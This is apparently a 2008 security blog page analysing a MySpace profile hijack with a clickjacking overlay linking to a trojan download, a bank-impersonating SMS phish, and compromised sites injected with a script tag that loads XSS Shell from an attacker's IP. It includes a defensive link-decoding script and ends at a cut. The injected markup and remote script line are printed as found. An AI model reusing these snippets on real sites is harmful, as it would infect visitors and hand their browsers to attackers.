Showing posts published in May 2008.

MySpace hack

After hearing all kinds of stories about bad security at MySpace, I finally found a hacked profile. The profile, cyn7777, has now been cleaned up, so some parts of what follows will not work anymore.

The key to the attack was the following lines, which were inserted in the profile's main page:

<a href="http://www.msplinks.com/MDFodHRwOi8vY29tLmNvbS9yZWRpcj9lZEl
kPTMmZGVzdFVybD1mdHA6Ly9taWNyb3NvZnBjZW50ZXI3MS5jbi9LQjg5MDgzMS5leG
U="><img
src="http://img341.imageshared.cn/.." style="position:absolute;
left:0px; top: 0px;" border="0"></a>

The code loaded an image similar to the following one and superimposed it on the page's contents. The actual image measured 990x990 and had a transparent background, so, at first sight, the figure could be taken for a system window: a classic picture-in-picture attack.

Screenshot of the fake removal tool window

Clicking anywhere on most of the page caused the browser to visit the base64-looking URL on msplinks.com. It turns out that back in April 2007 MySpace started to convert certain links to redirects through the msplinks.com site (check out the source of its index page :-)). The goal? "To easily turn off links to spam, phishing, or virus sites".

It looks like that didn't work too well... In fact, the link on msplinks.com (still) redirects to

(Incidentally, nice open redirector, cnet.com!)

The ftp site is still active and serves a bunch of exe files (all identical, except for their names). It seems the files have been changed in the last few days, probably to evade detection by anti-virus tools. In any case, VirusTotal recognizes the old and the new version as some form of trojan/downloader. According to Anubis, among other things, the binaries launch Internet Explorer and visit http://mycashloads.com/newuser.php?saff=373.0, which, however, redirects to yahoo.com.
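The msplinks.com path in the injected anchor is plain base64, so the link's target and the redirector it passes through can be inspected offline without visiting anything. The Python below is an added example, not code from the original post; the function names and the extension list are hypothetical, and skipping a short prefix before the URL is an assumption drawn from this single sample.

```python
import base64
from urllib.parse import urlsplit, parse_qsl

# href of the injected anchor quoted in the post, with its line breaks removed
SAMPLE_HREF = ("http://www.msplinks.com/"
               "MDFodHRwOi8vY29tLmNvbS9yZWRpcj9lZEl"
               "kPTMmZGVzdFVybD1mdHA6Ly9taWNyb3NvZnBjZW50ZXI3MS5jbi9LQjg5MDgzMS5leG"
               "U=")
RISKY_EXT = (".exe", ".scr", ".pif", ".bat")  # constructed list, extend as needed

def decode_msplinks(href):
    """Return the URL hidden in an msplinks.com path, or None if it does not decode."""
    host = urlsplit(href).hostname or ""
    if host != "msplinks.com" and not host.endswith(".msplinks.com"):
        return None
    token = urlsplit(href).path.lstrip("/")
    token += "=" * (-len(token) % 4)  # tolerate stripped padding
    try:
        raw = base64.b64decode(token, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    start = raw.find("http")  # assumption: a short prefix precedes an http(s) URL
    return raw[start:] if start >= 0 else None

def redirect_chain(url, max_hops=5):
    """List every hop reachable through URLs nested in query strings (no network I/O)."""
    chain = [url]
    for _ in range(max_hops):
        values = [v for _, v in parse_qsl(urlsplit(chain[-1]).query)]
        nested = [v for v in values if urlsplit(v).scheme and urlsplit(v).netloc]
        if not nested:
            break
        chain.append(nested[0])
    return chain

def triage(href):
    """Decode the link, unwrap nested redirects and flag what a reviewer should see."""
    hidden = decode_msplinks(href)
    if hidden is None:
        return {"chain": [], "flags": ["not a decodable msplinks link"]}
    chain = redirect_chain(hidden)
    final, flags = urlsplit(chain[-1]), []
    if len(chain) > 1:
        flags.append("nested redirect via " + urlsplit(chain[0]).hostname)
    if final.scheme not in ("http", "https"):
        flags.append("non-web scheme " + final.scheme)
    if final.path.lower().endswith(RISKY_EXT):
        flags.append("executable download")
    return {"chain": chain, "flags": flags}
```

Calling triage(SAMPLE_HREF) returns the decoded hops and the flags raised for the final one.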


Phish by SMS

And when you thought you knew all the tricks to detect phishing sites, had installed all the anti-phish browser plugins, and had developed a bunch of heuristics to identify phishing e-mails at first sight, they change the medium.

This morning I received the following SMS from 1010100001:

FRM:security@rabobankamerica.com
SUBJ:ALERT
MSG:Your Rabobank America account is closed due to unusual activity,
call us now at 8603830711.

Besides the obviously bogus source number, the fact that I don't have an account at Rabobank America was sort of a giveaway... The phone number turned out to be already disconnected, but I suspect I would have found a voice message asking for my credentials and other confidential information.

I think this is an interesting development. First, we are certainly less experienced at considering SMS content as suspicious. If you receive SMSs only from friends (and possibly the annoying advertisements from your carrier), you may think SMSs are trustworthy by default. Second, on cell phones, we may have fewer possibilities to check the authenticity of received messages: my (admittedly, very cheap and unsophisticated) phone has no anti-phish SMS plugin and no browser.

From the attacker's point of view, it would be interesting to see how they are paying for sending the messages. Compromised accounts on an SMS-sending web site? Stolen credit card? Other suggestions?


Phished and botted

It's not uncommon for attackers to exploit a vulnerable web server and use it for several different purposes: maximization of the return on investment, some might say. Cases in point are three recent entries in PhishTank (439391, 439479, and 442568).

As the PhishTank reference says, these sites were used to host phishing pages. Nothing special here: the usual replicas of banking and governmental web sites. More interestingly, all the legitimate HTML pages on the sites were modified to include the following script tag:

<script src="http://216.214.109.45/private/xxx/xssshell.asp?v=336699"></script>

This code fetches a copy of the XSS Shell, a tool that essentially transforms the browser into a bot, controllable by the attacker through cross-site scripting (XSS) mechanisms. The tool, published at the end of 2006 as a proof-of-concept of XSS, comes with a useful set of predefined commands (e.g., start keylogging, get internal IP, launch DoS attack), is prepackaged with a nice administration interface, and has extensive documentation.

It turns out that the attacker hasn't fully read the xssshell instructions, in particular the part on installing the back-end database outside of the document root, with the effect that the database is publicly accessible... The database contains information about the victims of the tool and a log of the attacker's commands. After opening the database, an MS Access file readable with the MDB Tools, it is possible to reconstruct some of the attacker's activity.

Here are the highlights: